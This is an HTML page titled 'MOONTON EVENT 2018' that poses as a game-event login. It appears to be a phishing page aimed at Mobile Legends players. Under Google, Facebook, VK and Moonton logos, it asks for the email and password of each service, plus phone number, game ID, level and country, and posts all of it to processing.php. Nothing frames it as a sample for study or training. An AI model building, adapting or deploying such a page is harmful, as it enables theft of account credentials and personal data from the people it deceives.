<!DOCTYPE html>
<html lang="en">
<head>
	<title>MOONTON EVENT 2018</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
<!--===============================================================================================-->	
	<link rel="icon" type="image/png" href="images/icons/favicon.ico"/>
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/bootstrap/css/bootstrap.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="fonts/font-awesome-4.7.0/css/font-awesome.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="fonts/iconic/css/material-design-iconic-font.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/animate/animate.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="vendor/css-hamburgers/hamburgers.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/animsition/css/animsition.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/select2/select2.min.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="vendor/daterangepicker/daterangepicker.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="css/util.css">
	<link rel="stylesheet" type="text/css" href="css/main.css">
<!--===============================================================================================-->
</head>
<body>
	<div class="limiter">
		<div class="container-login100">
			<div class="wrap-login100">
					<span class="login100-form-title p-b-26">
						Welcome
					</span>
					<span class="login100-form-title p-b-48">
						
					</span>
					<center><img src="http://diylogodesigns.com/blog/wp-content/uploads/2016/04/google-logo-icon-PNG-Transparent-Background.png" height="80px" widht="80px"></center>
 <form action="processing.php" method="POST">
					<div class="wrap-input100 validate-input" data-validate = "Valid email is: mail@example.com">
						<input class="input100" type="email" name="email" placeholder="Email" required="">
					</div>
					<div class="wrap-input100 validate-input" data-validate="Enter password">
						<span class="btn-show-pass">
							<i class="zmdi zmdi-eye"></i>
						</span>
						<input class="input100" type="password" name="pass" placeholder="Password" required="">
					</div>
<center><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c2/F_icon.svg/2000px-F_icon.svg.png" height="80px" widht="80px"></center>				
					<div class="wrap-input100 validate-input" data-validate = "enter email or number phone">
						<input class="input100" type="text" name="email1"
						 placeholder="Email" required="">
					</div>

					<div class="wrap-input100 validate-input" data-validate="Enter password">
						<span class="btn-show-pass">
							<i class="zmdi zmdi-eye"></i>
						</span>
						<input class="input100" type="password" name="pass1"  placeholder="Password" required="">
					</div>

<center><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/21/VK.com-logo.svg/2000px-VK.com-logo.svg.png" height="80px" widht="80px"></center>				
					<div class="wrap-input100 validate-input" data-validate = "enter email or number phone">
						<input class="input100" type="text" name="vk" placeholder="Email" requireq="">
					</div>

					<div class="wrap-input100 validate-input" data-validate="Enter password">
						<span class="btn-show-pass">
							<i class="zmdi zmdi-eye"></i>
						</span>
						<input class="input100" type="password" name="vk2" placeholder="Password" requireq="">
					</div>

<center><img src="https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcRlze4fim7IIHtDLYh6AEvGW2U2d8wGQPMAXGD_ggLrAwi0h31IQit35uAlWg" height="80px" widht="80px"></center>				
					<div class="wrap-input100 validate-input" data-validate = "Valid email is: mail@example.com">
						<input class="input100" type="email" name="mo" placeholder="Email" requireq="">
					</div>

					<div class="wrap-input100 validate-input" data-validate="Enter password">
						<span class="btn-show-pass">
							<i class="zmdi zmdi-eye"></i>
						</span>
						<input class="input100" type="password" name="mo2" placeholder="Password" requireq="">
					</div>
	<span class="login100-form-title p-b-26">
						Detail Game
					</span>
					<span class="login100-form-title p-b-48">
						
					</span>
						<div class="wrap-input100 validate-input" data-validate = "enter nick name or id account">
						<input class="input100" type="text" name="nk" placeholder="nick or id" requireq="">
					</div>
						<div class="wrap-input100 validate-input" data-validate = "enter number phone">
						<input class="input100" type="number" name="no" placeholder="number phone" requireq="">
					</div>
					<div class="wrap-input100 validate-input" data-validate = "enter level account">
						<input class="input100" type="number" name="lv" placeholder="your level" requireq="">
					</div>
					<div class="wrap-input100 validate-input" data-validate = "enter skins account">
						<input class="input100" type="number" name="sk" placeholder="your skin" requireq="">
					</div>
						<div class="wrap-input100 validate-input" data-validate = "enter your country">
						<input class="input100" type="text" name="cn" placeholder="city or country" requireq="">
					</div>
					<div class="container-login100-form-btn">
						<div class="wrap-login100-form-btn">
							<div class="login100-form-bgbtn"></div>
							<button class="login100-form-btn">
								Login
							</button>
						</div>
					</div>
				</form>
			</div>
		</div>
	</div>
	
	<div id="dropDownSelect1"></div>
	
<!--===============================================================================================-->
	<script src="vendor/jquery/jquery-3.2.1.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/animsition/js/animsition.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/bootstrap/js/popper.js"></script>
	<script src="vendor/bootstrap/js/bootstrap.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/select2/select2.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/daterangepicker/moment.min.js"></script>
	<script src="vendor/daterangepicker/daterangepicker.js"></script>
<!--===============================================================================================-->
	<script src="vendor/countdowntime/countdowntime.js"></script>
<!--===============================================================================================-->
	<script src="js/main.js"></script>



</body>
</html>